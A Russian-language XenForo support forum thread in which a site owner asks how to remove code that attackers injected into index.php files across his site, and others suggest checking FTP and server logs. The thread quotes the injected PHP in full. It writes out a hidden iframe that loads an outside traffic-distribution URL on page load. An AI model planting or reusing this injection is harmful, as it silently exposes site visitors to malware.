1. Приветствуем Вас на неофициальном форуме технической поддержки XenForo на русском языке. XenForo - коммерческий форумный движок от бывших создателей vBulletin, написанный на PHP.

1.2.3 Взломали сайт и форум добавили строки в index.php

Тема в разделе "Основные вопросы по XenForo", создана пользователем geokonsul, 05.12.2013.

Загрузка
  1. geokonsul

    geokonsul Местный

    Регистрация:
    05.05.12
    Сообщения:
    44
    Симпатии:
    1
    Версия XF:
    1.4.5
    Доброго времени суток!
    Кто может подсказать как избавиться от заразы:
    "
    Код:
    <?php
        /*CORE include code version:1.23 START*/
       
        $ml = "http://tds.mindupper.com/?id=deil";
        $fr = "<script type='text/javascript'>
        function create_frame(url) {
            var melm = document.getElementById('tfr12376hfd');
            if (typeof(melm) != 'undefined' && melm!= null)
            {}else{
                var iframe = document.createElement('iframe');
                iframe.id = \"tfr12376hfd\";
                iframe.style.width = \"10px\";
                iframe.style.height = \"10px\";
                iframe.style.border = \"0px\";
                iframe.frameBorder = \"0\";
                iframe.style.display = \"none\";
                iframe.setAttribute(\"frameBorder\", \"0\");
                document.body.appendChild(iframe);
                iframe.src = url;
                return true;
            }
        }
        function gtkhjasd454hfhf235(){
            create_frame(\"".$ml."\");   
        }
        try {
            if(window.attachEvent) {
                window.attachEvent('onload', gtkhjasd454hfhf235);
            } else {
            if(window.onload) {
                var curronload = window.onload;
                var newonload = function() {
                    curronload();
                    gtkhjasd454hfhf235();
                };
                window.onload = newonload;
            } else {
                window.onload = gtkhjasd454hfhf235;
            }
        }
        } catch(err) {}
        </script>";
        echo $fr;
       
        /*END CORE include code version:1.23*/
        ?>
    Код добавленный в index.php практически во все папки.
    Где shell искать не знаю...
    Заранее спасибо за советы.
     
  2. smbbws

    smbbws Местный

    Регистрация:
    28.09.13
    Сообщения:
    152
    Симпатии:
    36
    Версия XF:
    1.1.3
    посмотреть логи ftp и apache, на предмет подозрительных загрузок и обращений к скриптам.
     
    Oleg-2012 нравится это.
  3. Oleg-2012

    Oleg-2012 Местный

    Регистрация:
    21.04.12
    Сообщения:
    700
    Симпатии:
    297
    Если мне не изменяет память, то это уже третья тема о взломе здесь на форуме !

    Как-бы в каком плагине не было трояна, ну и хотелось-бы узнать лицензия, либо нулл самого движка !

    А вообще такие взломы врагу не пожелаешь, как потом это всё удалять, так это вообще кабздец, ведь тот-же шелл можно так зашифровать, хрен обнаружишь !:(
     
  4. geokonsul

    geokonsul Местный

    Регистрация:
    05.05.12
    Сообщения:
    44
    Симпатии:
    1
    Версия XF:
    1.4.5
    не нулл. Думаю это из-за джумлы. Джумлу снёс, всё почистил.
     
    Mirovinger нравится это.

Поделиться этой страницей